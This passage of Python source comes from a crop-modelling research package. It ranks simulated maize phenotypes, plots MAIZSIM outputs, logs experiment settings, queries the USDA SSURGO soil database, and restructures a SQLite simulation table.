Cut-off rank to be considered as 'top-ranking'.
Returns
-------
phenos_improved : list
All phenotypes that had positive rank change.
phenos_targeted : list
All phenotypes that had positive rank change and
also had final rank within rank_cutoff.
phenos_new : list
All phenotypes that ranked within rank_cutoff,
but was not originally one of the top ranked phenotypes.
"""
# Rank top phenos
top_phenos_present = rank_top_phenos('present', n_pheno, w_yield, w_disp)
top_phenos_future = rank_top_phenos(future_run, n_pheno, w_yield, w_disp)
# Calculate rank difference & identify new ranks
rank_diffs = []
new_ranks = []
for item, pheno in enumerate(top_phenos_present):
try:
new_rank = top_phenos_future.index(pheno)
new_ranks.append(new_rank)
rank_diffs.append(item-new_rank)
except (ValueError):
new_ranks.append(np.nan)
rank_diffs.append(np.nan)
# Compile into dataframe
df_ranks = pd.DataFrame({'top_phenos_present': top_phenos_present,
'new_rank': new_ranks,
'rank_diff': rank_diffs})
df_ranks_sorted = df_ranks.sort_values('rank_diff', ascending=False)
# Improved & targeted phenos
phenos_improved = list(df_ranks_sorted.query(
'rank_diff>0')['top_phenos_present'])
phenos_targeted = list(df_ranks_sorted.query('rank_diff>0').query(
f'new_rank<{rank_cutoff}')['top_phenos_present'])
# New phenos
pheno_select = [
count for count, pheno in enumerate(rank_diffs) if pheno is np.nan]
phenos_new = []
for item in pheno_select:
if item < rank_cutoff:
try:
new_pheno = top_phenos_future[item]
if new_pheno not in top_phenos_present:
phenos_new.append(new_pheno)
except IndexError:
print('future top ranks less than present day')
return(phenos_improved, phenos_targeted, phenos_new)
def phenostage_climate(df_all, df_gseason_climate,
df_waterdeficit, phenostage_num):
"""
Process climate data to get in-season summaries.
Parameters
----------
df_all : pd.DataFrame
df_gseason_climate : pd.DataFrame
df_waterdeficit : pd.DataFrame
phenostage_num : int
0 - Emerged
1 - Tasselinit
2 - Tasseled & Silked
3 - Grainfill
"""
phenostages = [['"Emerged"'], ['"Tasselinit"'],
['"Tasseled"', '"Silked"'], ['"grainFill"']]
phenos = np.arange(100)
sites = sorted(list(set(df_all.site)))
phenostage = phenostages[phenostage_num]
# temp
df = df_gseason_climate
sim = 'temp_air'
agg_method = 'mean'
mx_temp = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_temp = pd.DataFrame(mx_temp)
# vpd
df = df_gseason_climate
sim = 'vpd'
agg_method = 'mean'
mx_vpd = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_vpd = pd.DataFrame(mx_vpd)
# water deficit
df = df_waterdeficit
sim = 'water_deficit_mean'
agg_method = 'mean'
phenostage = phenostages[phenostage_num]
mx_wd = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_wd = pd.DataFrame(mx_wd)
return(df_temp, df_vpd, df_wd)
def calc_target_pheno_perct(df_params, phenos_ranked,
target_param, comparison):
"""
Calculate percent of targeted phenotypes with desired param trait.
df_params : pd.DataFrame
phenos_ranked : list
target_param : str
comparison : str
'greater' - select phenos with param value
greater than average param value.
'less_than' - select phenos with param values
less than average param value.
"""
# Calculate target parameter mean value
target_param_mean = df_params[target_param][:100].mean()
# Query phenotypes with parameter values greater than parameter mean
if comparison == 'greater':
phenos_targetparam = list(df_params[:100].query(
f'{target_param} > {target_param_mean}').cvar)
if comparison == 'less_than':
phenos_targetparam = list(df_params[:100].query(
f'{target_param} < {target_param_mean}').cvar)
# Calculate percent
phenos = []
for pheno in phenos_targetparam:
if pheno in phenos_ranked[50:]:
phenos.append(pheno)
perct = len(phenos)/len(phenos_targetparam)
return(phenos_targetparam, perct)
```
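A hedged usage sketch of the ranking helpers above, assuming the `present` run's `filepaths_present.yml` and the simulation outputs it references are available on disk; the weights and slice size below are illustrative.
```python
from ideotype.analysis import identify_top_phenos, rank_top_phenos

# Rank phenotypes at each site, weighting yield mean and yield dispersion equally
df_pheno, mx_pheno = identify_top_phenos('present', n_pheno=5, w_yield=1, w_disp=1)

# Collapse the per-site rankings into one overall ordering
top_ranked = rank_top_phenos('present', n_pheno=5, w_yield=1, w_disp=1)
print(top_ranked[:10])  # best-performing phenotypes overall
```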
#### File: ideotype/ideotype/figures.py
```python
import os
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from palettable.colorbrewer.diverging import PuOr_7
from palettable.cartocolors.sequential import PurpOr_6
from palettable.colorbrewer.sequential import YlGn_9
from palettable.wesanderson import Mendl_4
from ideotype.data_process import (read_data,
process_sims,
fetch_norm_mean_disp,
fetch_mean_disp_diff)
from ideotype.analysis import rank_top_phenos
from ideotype.init_params import params_sample
from ideotype.utils import fold
from ideotype import DATA_PATH
def plot_sims_heatmap(df, sim, agg_method, phenos_ranked,
cmap, vmins=None, vmaxs=None,
yfont_size=8, fig_w=20, fig_h=18,
save=False):
"""
Plot out simulation heatmaps.
Parameters
----------
df : pd.DataFrame
Queried maizsim output dataframe.
sim : str
MAIZSIM output you wish to plot.
agg_method : str
"""
# Read in sim data
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
'/home/disk/eos8/ach315/ideotype/ideotype/data/files/'
'filepaths_present.yml')
# Set up sites and phenotypes
sites_unsorted = list(set(df_sims.site))
sites = sites_unsorted.copy()
sites.sort()
phenos = list(set(df_sims.cvar))
# Set up phenostages
phenostages = [['"Emerged"'],
['"Tasselinit"'],
['"Tasseled"', '"Silked"'],
['"grainFill"']]
titles = ['Emerged',
'Tassel initiation',
'Tasseled & Silked',
'Grain Filling']
# Visualization
fig = plt.figure(figsize=(fig_w, fig_h))
for index in np.arange(4):
phenostage = phenostages[index]
mx_sims = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_sims = pd.DataFrame(mx_sims).reindex(phenos_ranked)
ax = fig.add_subplot(2, 2, index+1)
if (vmins is None) & (vmaxs is None):
sns.heatmap(df_sims, cmap=cmap,
cbar_kws={'shrink': 0.5})
else:
sns.heatmap(df_sims, cmap=cmap,
vmin=vmins[index], vmax=vmaxs[index],
cbar_kws={'shrink': 0.5})
ax.set_title(f'{titles[index]}', fontweight='light', size=14)
ax.set_xlabel('sites', fontweight='light', size=12)
ax.set_ylabel('phenotypes', fontweight='light', size=12)
plt.xticks(fontweight='light', fontsize=10)
ax.set_yticks(np.arange(0.5, len(phenos_ranked)+0.5))
ax.set_yticklabels(phenos_ranked, fontweight='light',
size=yfont_size, rotation=0)
plt.suptitle(f'{sim}', fontweight='light', x=0.5, y=0.93, size=20)
fig.subplots_adjust(wspace=0.08)
fig.subplots_adjust(hspace=0.15)
if save is True:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/heatmap_sims_{sim}.png',
format='png', dpi=800)
def plot_pheno_summary(df, pheno_stage,
target, phenos_ranked,
color, alpha,
target_phenos=None, target_color=None,
target_alpha=None, save=False):
"""
Plot out phenotype summaries of sim output.
Parameters
----------
df : pd.DataFrame
phenos_ranked : list
pheno_stage : str
target : str
target_phenos : list
"""
# Parameters
df_grouped = df.groupby(['cvar', 'pheno']).mean().reset_index()
sim_values = []
for pheno in phenos_ranked:
df_bool = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.cvar == pheno)][target].shape[0]
if df_bool == 0:
sim_values.append(np.nan)
else:
sim_value = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.cvar == pheno)][target].values.item()
sim_values.append(sim_value)
# Turn top pheno list into string for plotting purposes
phenos_str = [str(pheno) for pheno in phenos_ranked]
# Visualization
fig = plt.figure(figsize=(15, 4))
ax = fig.add_subplot(1, 1, 1)
ax.bar(phenos_str, sim_values, width=0.5, color=color, alpha=alpha)
ax.set_xlim(-2, 101)
ax.set_ylabel(target, fontweight='light', size=12)
ax.set_xlabel('phenotype', fontweight='light', size=12)
ax.set_title(f'{pheno_stage}', fontweight='light')
plt.xticks(fontweight='light', fontsize=8, rotation=90)
plt.yticks(fontweight='light', fontsize=10, rotation=0)
if target_phenos is not None:
for target_pheno in target_phenos:
ax.bar(str(target_pheno),
sim_values[phenos_ranked.index(target_pheno)],
width=0.5, color=target_color, alpha=target_alpha)
if save is True:
phenostage_write = pheno_stage.strip('"')
if target_phenos is None:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/'
f'bars_pheno_{target}_{phenostage_write}.png',
format='png', dpi=800)
else:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/'
f'bars_pheno_{target}_{phenostage_write}_'
f'targetpheno.png',
format='png', dpi=800)
def plot_site_summary(df, pheno_stage, target, color, alpha, save=False):
"""
Plot out site summaries of sim output.
Parameters
----------
df : pd.DataFrame
pheno_stage : str
"""
# Read in sims data
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
'/home/disk/eos8/ach315/ideotype/ideotype/data/files/'
'filepaths_present.yml')
# Parameters
df_grouped = df.groupby(['site', 'pheno']).mean().reset_index()
sites = [int(site) for site in df_sites.site]
sim_values = []
for site in sites:
df_bool = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.site == site)][target].shape[0]
if df_bool == 0:
sim_values.append(np.nan)
else:
sim_value = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.site == site)][target].values.item()
sim_values.append(sim_value)
# Visualization
fig = plt.figure(figsize=(10, 2))
ax = fig.add_subplot(1, 1, 1)
ax.set_xlim(-2, 61)
ax.bar(df_sites.site, sim_values, width=0.5, color=color, alpha=alpha)
ax.set_ylabel(target, fontweight='light', size=12)
ax.set_xlabel('sites', fontweight='light', size=12)
plt.xticks(fontweight='light', fontsize=8, rotation=90)
plt.yticks(fontweight='light', fontsize=10, rotation=0)
if save is True:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/bars_site_{target}.png',
format='png', dpi=800)
def plot_params_heatmap(df_params, top_phenos,
n_phenos_toplot=20, fig_w=9, fig_h=6,
save=None, save_text=None):
"""
Plot params heatmap.
Parameters
----------
df_params : pd.DataFrame
top_phenos: list
List of phenos to plot.
n_phenos_toplot : int
-1 - plot all top phenos
"""
# Determine which parameters were perturbed and their perturbation ranges
problem, param_values = params_sample('present', 10)
param_range = dict(zip(problem['names'], problem['bounds']))
params = problem['names']
df_params_fold = pd.DataFrame(columns=params)
# Normalize parameter values
if n_phenos_toplot == -1:
n_phenos_toplot = len(top_phenos)
if n_phenos_toplot > len(top_phenos):
n_phenos_toplot = len(top_phenos)
df_highperformance = df_params.iloc[top_phenos[:n_phenos_toplot], :-1]
for param in params:
df_params_fold[param] = fold(df_highperformance[param],
param_range[param][0],
param_range[param][1])
# Visualize
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.imshow(df_params_fold.transpose(), cmap=PuOr_7.mpl_colormap)
ax.set_xticks(np.arange(df_highperformance.shape[0]))
ax.set_yticks(np.arange(df_highperformance.shape[1]))
ax.set_xticklabels(list(df_highperformance.index),
size=10, fontweight='light')
ax.set_yticklabels(list(df_highperformance.columns),
size=10, fontweight='light')
for top_pheno in np.arange(n_phenos_toplot):
for param in range(len(params)):
ax.text(top_pheno, param,
df_params.transpose().loc[params[param],
top_phenos[top_pheno]],
ha='center', color='grey', size=7)
fig.subplots_adjust(left=0.15)
if save is True:
plt.savefig(f'/home/disk/eos8/ach315/upscale/figs/'
f'heatmap_params_{save_text}.png',
format='png', dpi=800)
def plot_rankchange(n_pheno, w_yield, w_disp, future_run,
fig_w=12, fig_h=4, save=None):
"""
Plot rank change.
Parameters
----------
n_pheno : int
w_yield : int
w_disp : int
future_run : str
n_phenos_toplot : int
save : bool
"""
# Prep ranks
top_phenos_present = rank_top_phenos('present', n_pheno, w_yield, w_disp)
top_phenos_future = rank_top_phenos(future_run, n_pheno, w_yield, w_disp)
rank_diffs = []
new_ranks = []
for item, pheno in enumerate(top_phenos_present):
try:
new_rank = top_phenos_future.index(pheno)
new_ranks.append(new_rank)
rank_diffs.append(item-new_rank)
except (ValueError):
new_ranks.append(np.nan)
rank_diffs.append(np.nan)
# Visualization
fig = plt.figure(figsize=(fig_w, fig_h))
ax = fig.add_subplot(1, 1, 1)
phenos = top_phenos_present[:]
y1s = []
y2s = []
for item, pheno in enumerate(phenos):
y1s.append(n_pheno-item)
y2s.append((n_pheno-item) + rank_diffs[item])
if rank_diffs[item] < 0:
plt.arrow(item, n_pheno-item, 0, rank_diffs[item],
head_width=0.8,
length_includes_head=True,
head_starts_at_zero=True,
color='tab:orange', alpha=0.8)
elif rank_diffs[item] > 0:
plt.arrow(item, n_pheno-item, 0, rank_diffs[item],
head_width=0.8,
length_includes_head=True,
color='tab:purple', alpha=0.8)
elif rank_diffs[item] == 0:
plt.scatter(item, n_pheno-item, c='grey', alpha=0.8, marker='_')
else:
try:
new_pheno = top_phenos_future[item]
if new_pheno in top_phenos_present:
plt.scatter(item, n_pheno-item, c='grey',
alpha=0.8, marker='x')
else:
plt.scatter(item, n_pheno-item, c='grey',
s=200, alpha=0.2, marker='o')
plt.text(item-0.5, n_pheno-item-1,
new_pheno, size=10, fontweight='light')
except IndexError:
print('future top ranks less than present day')
# x-axis
ax.set_xlim(-1, len(top_phenos_present))
ax.xaxis.tick_top()
ax.set_xticks(np.arange(len(top_phenos_present)))
ax.set_xticklabels(top_phenos_present, fontweight='light',
fontsize=10, rotation=90)
# y-axis
min_y = min(min(y1s), min(y2s))
min_y_rounded = round(min_y/5)*5
plt.ylabel('ranking', fontweight='light', size=14)
ax.set_ylim(min_y_rounded-1, n_pheno+1)
ax.set_yticks(np.arange(min_y_rounded, n_pheno+1, 5))
ax.set_yticklabels(np.arange(0, abs(min_y_rounded)+n_pheno+1, 5)[::-1],
fontweight='light')
# patch
rect = plt.Rectangle((-1, 0), len(top_phenos_present)+1, n_pheno+1,
facecolor='grey', alpha=0.1)
ax.add_patch(rect)
# save
if save is True:
plt.savefig(f'/home/disk/eos8/ach315/upscale/figs/'
f'rankchange_{future_run}_top{n_pheno}'
f'_y{w_yield}_d{w_disp}.png',
format='png', dpi=800)
def plot_cspace_rank(phenos_targeted, mx_present, mx_future,
df_climate_x_present, df_climate_y_present,
df_climate_x_future, df_climate_y_future,
climate_x, climate_y):
"""
Plot out rank in cspace.
Parameters
----------
phenos_targeted : list
climate_x : str
climate_y : str
"""
fig = plt.figure(figsize=(16, 10))
for item, pheno in enumerate(phenos_targeted):
ax = fig.add_subplot(4, 5, item+1)
# current climate
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
marker='o', facecolors='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
c=mx_present[pheno],
cmap=PurpOr_6.mpl_colormap.reversed(),
vmin=0, vmax=20, alpha=0.4, s=60)
# future climate
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
marker='^', facecolor='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
c=mx_future[pheno], cmap=PurpOr_6.mpl_colormap.reversed(),
marker='^', vmin=0, vmax=20, alpha=0.4, s=60)
ax.set_xlim(8, 35)
ax.set_ylim(0, 4.1)
ax.set_xlabel(climate_x, fontweight='light')
ax.set_ylabel(climate_y, fontweight='light')
ax.annotate(pheno, (12, 3.2), fontweight='light', size=10)
def plot_cspace_yield(phenos_targeted, df_grouped_present, df_grouped_future,
df_climate_x_present, df_climate_y_present,
df_climate_x_future, df_climate_y_future,
climate_x, climate_y, vmin=80, vmax=250):
"""
Plot out yield in cspace.
Parameters
----------
phenos_targeted : list
climate_x : str
climate_y : str
"""
fig = plt.figure(figsize=(16, 10))
for item, pheno in enumerate(phenos_targeted):
df_present = df_grouped_present[df_grouped_present.cvar == pheno]
df_future = df_grouped_future[df_grouped_future.cvar == pheno]
ax = fig.add_subplot(4, 5, item+1)
# current climate
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
marker='o', facecolors='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
c=df_present.dm_ear,
cmap=YlGn_9.mpl_colormap,
vmin=vmin, vmax=vmax, alpha=0.6, s=60)
# future climate
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
marker='^', facecolor='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
c=df_future.dm_ear,
cmap=YlGn_9.mpl_colormap,
marker='^',
vmin=vmin, vmax=vmax, alpha=0.6, s=60)
ax.set_xlim(8, 35)
ax.set_ylim(0, 4.1)
ax.set_xlabel(climate_x, fontweight='light')
ax.set_ylabel(climate_y, fontweight='light')
ax.annotate(pheno, (12, 3.2), fontweight='light', size=10)
def plot_mean_disp_change(run_name_present, run_name_future, phenos):
"""
Plot yield mean and yield dispersion change.
Parameters
----------
run_name_present : str
run_name_future : str
phenos : list
"""
yield_mean_norm_present, yield_disp_norm_present = fetch_norm_mean_disp(
run_name_present)
yield_mean_norm_future, yield_disp_norm_future = fetch_norm_mean_disp(
run_name_future)
diffs_yield, diffs_disp = fetch_mean_disp_diff(
run_name_present, run_name_future, phenos)
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot()
ax.scatter(yield_mean_norm_present, yield_disp_norm_present,
c='slategrey', s=100, alpha=0.2)
ax.scatter(yield_mean_norm_present[phenos],
yield_disp_norm_present[phenos],
c='tab:purple', s=100, alpha=0.4)
for item, pheno in enumerate(phenos):
plt.arrow(yield_mean_norm_present[pheno],
yield_disp_norm_present[pheno],
diffs_yield[item], diffs_disp[item],
color='grey', alpha=0.5,
head_width=0.01)
for pheno in phenos:
ax.annotate(pheno, (yield_mean_norm_present[pheno],
yield_disp_norm_present[pheno]), c='grey')
ax.set_ylim(-0.1, 1.1)
ax.set_xlim(-0.1, 1.1)
ax.set_xlabel('yield mean', fontweight='light', size=14)
ax.set_ylabel('dispersion index', fontweight='light', size=14)
ax.set_title('Yield mean and dispersion - averaged over all sites',
fontweight='light', size=15)
def plot_sims_yield(run_name, pheno):
"""
Plot detailed sim plots for yield.
Parameters
----------
run_name : str
pheno : int
"""
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml'))
cols = ['date', 'jday', 'time',
'leaves', 'mature_lvs', 'drop_lvs', 'LA', 'LA_dead', 'LAI',
'RH', 'leaf_WP', 'PFD', 'Solrad',
'temp_soil', 'temp_air', 'temp_can',
'ET_dmd', 'ET_suply', 'Pn', 'Pg', 'resp', 'av_gs',
'LAI_sunlit', 'LAI_shaded',
'PFD_sunlit', 'PFD_shaded',
'An_sunlit', 'An_shaded',
'Ag_sunlit', 'Ag_shaded',
'gs_sunlit', 'gs_shaded',
'VPD', 'N', 'N_dmd', 'N_upt', 'N_leaf', 'PCRL',
'dm_total', 'dm_shoot', 'dm_ear', 'dm_totleaf',
'dm_dropleaf', 'dm_stem', 'dm_root',
'soil_rt', 'mx_rootdept',
'available_water', 'soluble_c', 'note']
fig = plt.figure(figsize=(20, 50))
sites = df_sites.site
for loc in np.arange(60):
ax = fig.add_subplot(12, 5, loc+1)
ax.set_ylim(0, 350)
ax.set_xlim(0, 5000)
ax.annotate(f'{loc}: {sites[loc]} - {df_sites.iloc[loc]["state"]}',
(200, 320))
site = sites[loc]
years = df_sims.query(f'cvar=={pheno}').query(f'site=="{site}"').year
for year in years:
df = pd.read_csv(
f'/home/disk/eos8/ach315/upscale/sims/'
f'{run_name}/{year}/var_{pheno}/'
f'out1_{site}_{year}_var_{pheno}.txt')
df.columns = cols
ax.plot(df.dm_ear, alpha=0.5)
ax.annotate(year, (len(df), list(df.dm_ear)[-1]), color='grey')
def plot_sims_phenostage(run_name, pheno, df_sims, df_sites, df_phenology):
"""
Plot phenostage sims for all years for specified pheno.
Parameters
----------
run_name : str
pheno : int
df_sims : pd.DataFrame
Output from `read_data` function.
df_sites : pd.DataFrame
Output from `read_data` function.
df_phenology : pd.DataFrame
csv data queried from sim database.
"""
fig = plt.figure(figsize=(20, 50))
sites = df_sites.site
phenostages = ['"Germinated"', '"Emerged"', '"Tasselinit"',
'"Tasseled"', '"Silked"', '"grainFill"', '"Matured"']
colors = ['#66a61e', '#1b9e77',
Mendl_4.mpl_colors[0],
Mendl_4.mpl_colors[1],
Mendl_4.mpl_colors[3],
Mendl_4.mpl_colors[2]]
for item, site in enumerate(sites):
ax = fig.add_subplot(12, 5, item+1)
ax.set_title(f'{item}: {site} - {df_sites.iloc[item]["state"]}',
fontweight='light')
ax.set_xlim(50, 360)
ax.set_ylim(1959, 2007)
jday_months = [32, 61, 91, 121, 152, 182, 213, 244, 274, 305, 335]
ax.set_xticks(jday_months)
ax.set_xticklabels([2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],
fontweight='light', fontsize=12)
years = df_sims.query(f'cvar=={pheno}').query(f'site=="{site}"').year
for year in years[:]:
df_phenology_sub = df_phenology.query(
f'cvar=={pheno}').query(f'site=={site}').query(f'year=={year}')
jdays = []
for phenostage in phenostages:
try:
jday = df_phenology_sub[
df_phenology_sub['pheno'] == phenostage].jday.item()
jdays.append(jday)
except(ValueError):
jdays.append(np.nan)
if jdays[-1] is np.nan:
# check if pheno reached grain-fill
# but did not make it to maturity
df = pd.read_csv(
f'/home/disk/eos8/ach315/upscale/sims/'
f'{run_name}/{year}/var_{pheno}/'
f'out1_{site}_{year}_var_{pheno}.txt')
df.iloc[-1]['date']
date = datetime.strptime(df.iloc[-1]['date'], '%m/%d/%Y')
jday = int(date.strftime('%j'))
if jday >= 333:
# jday 333 = Nov. 29th
# set last day of grain-fill to Nov. 29th
jdays[-1] = 333
for loc, color in zip(np.arange(len(phenostages)), colors):
ax.plot([jdays[loc], jdays[loc+1]], [year, year], color=color)
fig.subplots_adjust(hspace=0.25)
```
#### File: ideotype/ideotype/log.py
```python
import os
import yaml
from ideotype.data import DATA_PATH
def log_fetchinfo(run_name):
"""
Fetch info needed for experiment log file.
Parameters
----------
run_name: str
Run name for batch of maizsim simulations.
Must match an existing experiment run name.
Notes
_____
- init_runame.yml info stored in /ideotype/ideotype/data/inits/
- Each run experiment should have unique init_runame.yml file.
"""
# setup file name for init_.yml with relative path in data folder
fpath_init = os.path.join(DATA_PATH, 'inits', 'init_' + run_name + '.yml')
# check whether specified init_.yml file exist
if not os.path.isfile(fpath_init):
raise ValueError(f'init param file {fpath_init} does not exist!')
# setup log file
log_runinfo = os.path.join(DATA_PATH, 'logs',
'log_' + run_name + '.yml')
# check if log file for experiment exists already
if os.path.isfile(log_runinfo):
raise ValueError(
f'log file for run_name: "{run_name}" exists already!')
# read in init param yaml file
with open(fpath_init, 'r') as pfile:
dict_init = yaml.safe_load(pfile)
# check that run name listed in yaml file matches
# what was passed to log_fetchinfo
if dict_init['setup']['run_name'] != run_name:
raise ValueError('mismatched yaml run name!')
# setup dict to hold all log info
dict_log = {}
# fetch all setup info from yaml file and add to log
for key, value in dict_init['setup'].items():
dict_log[key] = value
dict_log['params'] = dict_init['params']
dict_log['specs'] = dict_init['specs']
# add yaml file name to log
dict_log['pdate'] = dict_init['init']['plant_date']
dict_log['init_yml'] = 'init_' + run_name + '.yml'
# import package version and add to log
from ideotype import __version__
dict_log['ideotype_version'] = __version__
# writing out log as yaml file
with open(log_runinfo, 'w') as outfile:
yaml.dump(dict_log, outfile, default_flow_style=False)
```
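A hedged sketch of the init-file contract implied by `log_fetchinfo`: the run name, every key under `setup`, plus `params`, `specs`, and the plant date under `init` end up in the log. The `demo` run name and the parameter values below are hypothetical.
```python
import os
import yaml
from ideotype.data import DATA_PATH
from ideotype.log import log_fetchinfo

dict_init = {
    'setup': {'run_name': 'demo', 'base_path': '/tmp/demo_sims'},  # hypothetical
    'params': {'g1': [1.0, 10.0]},                                 # hypothetical
    'specs': {'n_samples': 10},                                    # hypothetical
    'init': {'plant_date': '04-15'},                               # hypothetical
}
with open(os.path.join(DATA_PATH, 'inits', 'init_demo.yml'), 'w') as f:
    yaml.dump(dict_init, f)

log_fetchinfo('demo')  # writes DATA_PATH/logs/log_demo.yml
```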
#### File: ideotype/ideotype/soils_query.py
```python
import requests
import xmltodict
import pandas as pd
def soilquery(latitude, longitude):
"""
Query for NRCS SSURGO soil database (code modified from Maura, USDA ARS).
Info on SSURGO database:
https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/survey/geo/?cid=nrcs142p2_053631
- awc_r:
The amount of water that an increment of soil depth,
inclusive of fragments, can store that is available to plants.
AWC is expressed as a volume fraction,
and is commonly estimated as the difference between
the water contents at 1/10 or 1/3 bar (field capacity)
and 15 bars (permanent wilting point) tension
and adjusted for salinity, and fragments.
- dbthirdbar_r:
The oven dry weight of the less than 2 mm soil material
per unit volume of soil at a water tension of 1/3 bar.
- wthirdbar_r:
The volumetric content of soil water retained
at a tension of 1/3 bar (33 kPa, field capacity, saturation),
expressed as a percentage of the whole soil (need to divide by 100).
- wfifteenbar_r:
The volumetric content of soil water retained at
a tension of 15 bars (1500 kPa, wilting point),
expressed as a percentage of the whole soil.
"""
lat = str(latitude)
lon = str(longitude)
lonLat = lon + " " + lat
url = "https://SDMDataAccess.nrcs.usda.gov/Tabular/SDMTabularService.asmx"
# headers = {'content-type': 'application/soap+xml'}
headers = {'content-type': 'text/xml'}
body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:sdm="http://SDMDataAccess.nrcs.usda.gov/Tabular/SDMTabularService.asmx">
<soap:Header/>
<soap:Body>
<sdm:RunQuery>
<sdm:Query>SELECT
co.cokey as cokey,
ch.chkey as chkey,
comppct_r as prcent,
slope_r,
slope_h as slope,
hzname,
hzdept_r as depth,
awc_r as awc,
claytotal_r as clay,
silttotal_r as silt,
sandtotal_r as sand,
om_r as OM,
dbthirdbar_r as dbthirdbar,
wthirdbar_r as th33,
wfifteenbar_r as th1500,
(dbthirdbar_r-wthirdbar_r)/100 as bd
FROM sacatalog sc
FULL OUTER JOIN legend lg
ON sc.areasymbol=lg.areasymbol
FULL OUTER JOIN mapunit mu ON lg.lkey=mu.lkey
FULL OUTER JOIN component co ON mu.mukey=co.mukey
FULL OUTER JOIN chorizon ch ON co.cokey=ch.cokey
FULL OUTER JOIN chtexturegrp ctg ON ch.chkey=ctg.chkey
FULL OUTER JOIN chtexture ct ON ctg.chtgkey=ct.chtgkey
FULL OUTER JOIN copmgrp pmg ON co.cokey=pmg.cokey
FULL OUTER JOIN corestrictions rt ON co.cokey=rt.cokey
WHERE mu.mukey IN (
SELECT *
from SDA_Get_Mukey_from_intersection_with_WktWgs84('point(""" + lonLat + """)'))
order by co.cokey, ch.chkey, prcent, depth
</sdm:Query>
</sdm:RunQuery>
</soap:Body>
</soap:Envelope>"""
response = requests.post(url, data=body, headers=headers)
# Put query results in dictionary format
my_dict = xmltodict.parse(response.content)
# Convert from dictionary to dataframe format
df_soil = pd.DataFrame.from_dict(
my_dict['soap:Envelope']['soap:Body'][
'RunQueryResponse']['RunQueryResult'][
'diffgr:diffgram']['NewDataSet']['Table'])
# Drop columns where all values are None or NaN
df_soil = df_soil.dropna(axis=1, how='all')
df_soil = df_soil[df_soil.chkey.notnull()]
# Drop unnecessary columns
df_soil = df_soil.drop(['@diffgr:id',
'@msdata:rowOrder',
'@diffgr:hasChanges'], axis=1)
# Drop duplicate rows
df_soil = df_soil.drop_duplicates()
# Convert prcent and depth column from object to float
df_soil['prcent'] = df_soil['prcent'].astype(float)
df_soil['depth'] = df_soil['depth'].astype(float)
df_soil['clay'] = df_soil['clay'].astype(float)
df_soil['silt'] = df_soil['silt'].astype(float)
df_soil['sand'] = df_soil['sand'].astype(float)
df_soil['OM'] = df_soil['OM'].astype(float)
df_soil['th33'] = df_soil['th33'].astype(float)
df_soil['bd'] = df_soil['bd'].astype(float)
# Select rows with max prcent
df_soil = df_soil[df_soil.prcent == df_soil.prcent.max()]
# Sort rows by depth
df_soil = df_soil.sort_values(by=['depth'])
return df_soil
```
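A usage sketch for the query above: fetch the horizon profile for a single point and inspect the texture and water-retention columns. The coordinates (near Ames, Iowa) are illustrative, and the call needs network access to the NRCS Soil Data Mart service.
```python
from ideotype.soils_query import soilquery

df_soil = soilquery(latitude=42.0, longitude=-93.6)
# one row per horizon of the dominant map-unit component, sorted by depth
print(df_soil[['hzname', 'depth', 'clay', 'silt', 'sand', 'awc', 'th33']])
```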
#### File: ideotype/ideotype/sql_altertable.py
```python
from sqlalchemy import create_engine
def alter_table(fpath_db):
"""Reorder sims DB order to take advantage of auto-index."""
engine = create_engine('sqlite:///' + fpath_db)
with engine.connect() as con:
con.execute('PRAGMA foreign_keys=off')
con.execute('BEGIN TRANSACTION')
con.execute(
'CREATE TABLE IF NOT EXISTS new_sims(\
year int not null,\
cvar int not null,\
site varchar(6) not null,\
run_name varchar(20) not null,\
jday int not null,\
time int not null,\
date varchar(10),\
leaves float,\
leaves_mature float,\
leaves_dropped float,\
LA_perplant float,\
LA_dead float,\
LAI float,\
leaf_wp float,\
temp_soil float,\
temp_air float,\
temp_canopy float,\
ET_dmd float,\
ET_sply float,\
Pn float,\
Pg float,\
resp float,\
av_gs float,\
LAI_sun float,\
LAI_shade float,\
PFD_sun float,\
PFD_shade float,\
An_sun float,\
An_shade float,\
Ag_sun float,\
Ag_shade float,\
gs_sun float,\
gs_shade float,\
VPD float,\
Nitr float,\
N_Dem float,\
NUpt float,\
LeafN float,\
PCRL float,\
DM_total float,\
DM_shoot float,\
DM_ear float,\
DM_leaf float,\
DM_stem float,\
DM_root float,\
AvailW float,\
solubleC float,\
pheno varchar(20),\
PRIMARY KEY (year, cvar, site, run_name, jday, time),\
FOREIGN KEY (cvar) REFERENCES params (cvar),\
